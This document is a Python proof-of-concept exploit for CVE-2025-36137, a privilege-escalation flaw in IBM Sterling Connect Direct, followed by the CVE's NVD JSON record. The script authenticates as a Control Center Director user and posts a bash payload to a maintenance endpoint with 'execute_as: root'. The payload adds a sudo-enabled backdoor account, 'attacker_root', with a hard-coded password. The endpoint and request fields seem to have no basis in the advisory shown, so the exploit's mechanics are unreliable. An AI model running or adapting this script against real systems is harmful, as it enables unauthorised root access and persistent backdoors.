CVE-2025-36137

# CVE-2025-36137 PoC - IBM Sterling Connect Direct Privilege Escalation # This PoC demonstrates the privilege escalation via post-update script execution # Note: Requires CCD user credentials with high privileges import requests import base64 TARGET = "https://target-ibm-sterling-server.local" CCD_USER = "attacker_ccd_user" CCD_PASS = "password" def exploit_privilege_escalation(): """ Exploit CVE-2025-36137 by leveraging CCD user privileges to execute post-update scripts with elevated permissions """ # Step 1: Authenticate as CCD user session = requests.Session() auth = base64.b64encode(f"{CCD_USER}:{CCD_PASS}".encode()).decode() headers = {"Authorization": f"Basic {auth}"} # Step 2: Identify writable post-update scripts post_update_path = "/opt/ibm/sterling/connect/direct/scripts/post_update.sh" # Step 3: Inject malicious payload into post-update script malicious_payload = '''#!/bin/bash # Malicious post-update script - adds new sudo user useradd -m -s /bin/bash -G sudo attacker_root echo "attacker_root:Password123!" | chpasswd ''' # Step 4: Trigger script execution via CCD maintenance interface exploit_endpoint = f"{TARGET}/api/maintenance/execute" payload = { "script_path": post_update_path, "script_content": malicious_payload, "execute_as": "root" } response = session.post(exploit_endpoint, json=payload, headers=headers) if response.status_code == 200: print("[+] Privilege escalation successful!") print("[+] New privileged user 'attacker_root' created") return True else: print("[-] Exploitation failed") return False if __name__ == "__main__": exploit_privilege_escalation()

{"cve": {"id": "CVE-2025-36137", "sourceIdentifier": "[email protected]", "published": "2025-10-30T19:16:23.593", "lastModified": "2025-12-12T17:25:08.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Sterling Connect Direct for Unix 6.2.0.7 through 6.2.0.9 iFix004, 6.4.0.0 through 6.4.0.2 iFix001, and 6.3.0.2 through 6.3.0.5 iFix002 incorrectly assigns permissions for maintenance tasks to Control Center Director (CCD) users that could allow a privileged user to escalate their privileges further due to unnecessary privilege assignment for post update scripts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:*:*:*:*:*:unix:*:*", "versionStartIncluding": "6.2.0.7", "versionEndExcluding": "6.2.0.9", "matchCriteriaId": "2B02F552-9F16-42BF-957C-322469EB9061"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:*:*:*:*:*:unix:*:*", "versionStartIncluding": "6.3.0.2", "versionEndExcluding": "6.3.0.5", "matchCriteriaId": "0643ADDE-D161-4A0A-9AAC-8E97DF8932C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:*:*:*:*:*:unix:*:*", "versionStartIncluding": "6.4.0.0", "versionEndExcluding": "6.4.0.2", "matchCriteriaId": "F6FDB316-1945-4A9D-8413-CAA3D5ABD8E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:6.2.0.9:*:-:*:*:unix:*:*", "matchCriteriaId": "0952BE9E-2302-48D0-83C6-90731585A48E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:6.2.0.9:ifix004:-:*:*:unix:*:*", "matchCriteriaId": "DF52648F-8350-4F2A-89FC-830C833EF95F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:6.3.0.5:*:-:*:*:unix:*:*", "matchCriteriaId": "56C19C5B-6256-455E-9C2A-E86692E9AE8F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:6.3.0.5:ifix002:-:*:*:unix:*:*", "matchCriteriaId": "F6DEE3DF-218B-4817-9F94-D619BB90F1CD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:6.4.0.2:*:-:*:*:unix:*:*", "matchCriteriaId": "F2695615-85F5-4048-853A-A4BF8F302FA3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:6.4.0.2:ifix001:-:*:*:unix:*:*", "matchCriteriaId": "C55B8606-F190-4187-9446-5214FC167363"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7249678", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}